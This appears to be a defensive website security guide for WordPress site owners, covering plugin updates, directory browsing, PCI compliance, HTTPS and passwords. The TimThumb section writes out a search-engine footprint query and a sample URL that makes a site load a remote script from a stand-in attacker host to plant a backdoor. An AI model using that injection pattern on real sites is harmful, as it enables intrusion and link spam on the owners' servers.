How to Approach Security
The key is the mindset. If you go out looking for how to patch holes all day, you will never figure out how to find holes. It’s easy to find the holes that hackers find once you know what to look for. Think like a hacker.
Footprints
Holes have footprints. Hackers have automated the footprint-finding to a reasonable degree. How do they do it? It’s fairly simple. They load up a program like WPScan (specifically for WordPress). WPScan acts in many ways like Scrapebox looking for a place to leave a comment.
WPScan looks for the top known exploits (likely posted on Exploits Database by Offensive Security – some of our posts on the old forum wound up here.) Usually, it’s a plugin. WPScan will load each individual plugin file, like .com/wp-content/plugins/exploit-plugin-here/readme.html. If the readme.html file shows a 200 (and usually has the version number) the program will alert the hacker of the hole, and will then hack the site knowing exactly which exploit to use. No further research needed.
Sometimes the exploit will be ridiculously large. When TimThumb’s exploit hit, people just used Google searching for footprints of the theme developers who used TimThumb. (Hint: always be weary of querystrings.) Hackers then just ran simple querystrings that uploaded a backdoor to the server, making it easy for Russians to add buy viagra links to thousands of sites all while cloaking it to the webmaster.
Let’s make this a little easier to explain.
Hacker goes to Google, gets results for intext:”Theme Developed by Dumbass”
Grabs the list of sites knowing they all use TimThumb (an image resizing machine).
Types in poorsuckersdomain.com/?resizethis=http://hackersite.com/badscript.js
And now has a backdoor that only the hacker can access. Make sense?
In reality, hackers don’t even need Google. There are search engines like https://meanpath.com that will literally allow people to search for code itself of the entire web. Some people have their own web scrapers and share that data within their own search engine.
This the basics of how hackers use footprints, and should open your mind to how hackers operate.
Motivation
For some hackers it’s the lulz (laughs). For some it’s to build a white-hat hacking career and get a job at a place like Sucuri. The Syrian Electronic Army is all about political statements. Anonymous is about sending a powerful message. There are many sects of of hackers.
But financial gain is usually the key motivator. Some Russian link networks are incredible, and thus pretty expensive. Typically Russian networks are all hacked sites. The players in sex cam, porn, gambling, and penis pill niches employ the hackers. Hackers know the link game. They make serious money on it. A few become affiliates and do SEO themselves.
As a hacker, they don’t even have to bother with the risk of being caught stealing credit card info (that’s called carding, c4rding, c4rd1ng, etc.). They can make serious money selling links and run a low risk to ever have governments cracking down on them.
Being Safe
Old Plugins
The easiest exploit of all time is to find old plugins that haven’t been patched. It’s simple, just update your plugins regularly. Occasionally new exploits will show up with a new version, but it is very rare. Just stay up to date.
If you are afraid you will break your site, remember you’re at a greater risk of a hacker breaking the site by leaving old plugins running.
Best Practice
Keep an eye of your own footprint. Check the site: command to see what gets indexed. When W3TC’s database exploit (found by one of our own) became well-known, the footprint was insanely large. It was easily avoidable by disabling directory browsing – one of the worst features Apache has ever created.
The bottom line is, try to find your own footprints. Look in your FTP folders and see if you do some “stupid” things like store backups with the name backup.zip in the root folder. Congratulations, there is your entire database waiting for some hacker to download.
Better WP Security
We love Better WP Security. Really, all security plugins do the same thing. This is our favorite. We aren’t going to tell you which settings we use on which sites because they change, and we don’t want a footprint or a smart hacker in the group to show us.
Yes, Better WP Security itself had an exploit. It’s patched. Always stay up to date and you won’t have a problem.
Directory Browsing
As mentioned earlier, this one will show everything in your FTP backend if there is not an index file to say otherwise. Google sees them as 200 codes and indexes them. Not only is it bad for SEO because of wasted juice and content issues. Better WP Security has an option to fix it. But if you’re not on WordPress, just add the following line to .htaccess:
Options -Indexes
E-commerce
If you’re handling credit card data, you must work to become PCI Compliant. Usually there are extensions that handle all of this work for you. The bottom line is this:
1. Your backend should not be able to display CC info.
2. Your FTP access should be on a different address.
3. Your database should be on another server.
Want an easy way to do it? Use Synthesis, WooCommerce, and Authorize.net CIM. Problems solved.
We have seen too many sites built on Magento that just have credit card data sitting on a $2 host with no security for the backend where the credit card data is viewable. It’s absolutely insane. Just run users through an off-site payment platform before you handle credit cards if you aren’t ready.
HTTPS
This is a fun one now that top sources tell us HTTPS is useless (at least for hiding data from the NSA). For the average hacker it keeps them away.
HTTPS will have its own section here as it has its own complications. If you can’t get the padlock to show correctly on your site, use Why No Padlock. If you want the green bar saying who you are, there are more hoops to jump through but that’s called an E.V. certificate. Data is no more encrypted this way, it’s a feel-good security solution.
Right now we prefer Comodo for security certificates. GoDaddy and the others just reek of “cheap”.
Wifi Spying
Anytime that you share a Wifi connection with someone (very common in large universities, libraries, airports, conferences, etc.) you run the risk of being hacked. A huge risk, especially if your email account isn’t through HTTPS connections. If your mail on mobile doesn’t run through HTTPS, fix it immediately or disable Wifi.
So how hard is it to hack someone via Wifi? Someone made a user-interface called Firesheep. It’s insanely easy to hack this way. All it does is hijack cookie sessions. This exploit was around for years, known by Facebook and Google, and still was no security remedy was given for the masses because of how expensive it was to convert the networks to HTTPS by default.
Need to break into a wifi network? That’s illegal and we can’t recommend it, but some have been brave enough to post about how to use Wireshark to get Wifi passwords.
Cell Hacking
This has nothing to do with the normal realm of security, but some inquiring minds like to know how it’s done. Instead of hijacking cookie sessions as done with Wifi Spying.
Passwords
Please, please, please make your passwords complex. 1Password has a generator and is also an excellent password management solution.
DarkC0de has a nice list of passwords to brute force login attempts. A ton of passwords are on here. Don’t be a fool.
Usernames are also important but often forgotten. Avoid “Admin” for your logins. Use the brand name at least.
Password Management Solutions For Teams
The SSO (single sign on) solutions that mega-sized companies use are too big for our tastes. The teams should be under contract so you don’t have to go change hundreds of passwords. If you want random outsourcers to have access, use something like SimpleSafe to assign rights, then have a staffer change them after the project is complete.
Personal Profiling
Profiling (Mother’s maiden name, dog’s name, birthdate) – sometimes all this data is available on Facebook. You may want to create a sub-set of answers that aren’t true. When it asks for “city where you met your significant other” make it a rule to only put the state or county. When it asks for dog’s name, pick a random dog and always use it. Don’t be so quick to answer these, and be careful who finds the info.
Sometimes, questioning sources are worked against each other. As one Wired.com writer found, a hacker used Apple and Amazon against each other to gain access to his entire digital life.
Summary
Use Better WP Security.
If you take credit cards, get PCI compliant.
Keep your plugins up to date.
Options -Indexes is your friend.
Make passwords that can’t be brute-forced.
Avoid admin usernames.
Be careful on Wifi.
Think like a hacker.